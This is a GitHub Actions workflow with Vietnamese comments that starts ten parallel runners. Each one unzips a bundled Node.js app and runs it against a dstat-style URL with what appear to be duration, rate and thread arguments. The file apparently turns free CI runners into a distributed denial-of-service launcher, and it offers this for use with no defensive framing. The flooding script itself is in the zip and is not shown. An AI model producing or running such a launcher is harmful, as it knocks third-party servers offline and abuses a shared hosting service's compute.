name: NEGANCSL

on:
  workflow_dispatch:   # chạy thủ công
  push:
    paths:
      - ".github/workflows/**"   # chạy khi có thay đổi file trong workflows

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        server: [1,2,3,4,5,6,7,8,9,10]
    name: Máy ${{ matrix.server }}

    steps:
      - name: Lấy mã nguồn từ repository
        uses: actions/checkout@v4

      - name: Giải nén file zip
        run: unzip my_node_app.zip

      - name: Chạy script Node.js
        run: node 2 https://high-cloudflare.dstat123.uk/4bf58e58-58a3-40c3-bce8-6b8e809802dah 260 10 10